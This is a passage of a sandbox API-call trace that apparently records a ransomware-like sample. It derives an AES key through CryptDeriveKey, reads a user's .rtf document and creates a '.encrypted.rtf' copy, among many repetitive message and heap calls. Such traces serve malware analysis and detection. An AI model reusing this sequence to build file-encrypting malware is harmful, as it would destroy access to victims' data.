wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.719] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.719] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.719] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.719] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.719] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.719] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.719] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.719] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.719] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.719] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.720] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.720] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.720] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.720] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.720] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.720] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.721] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.721] CryptDestroyHash (hHash=0x7c2240) returned 1 [0033.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pcrlz1tseuav.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.721] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.721] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0033.723] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt")) returned 0x10 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0033.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.encrypted.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pcrlz1tseuav.encrypted.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.724] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.725] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.726] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0033.728] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x7561, lpOverlapped=0x0) returned 1 [0033.728] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17561) returned 0x8affc0 [0033.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17561) returned 0x8c7530 [0033.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.731] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.731] 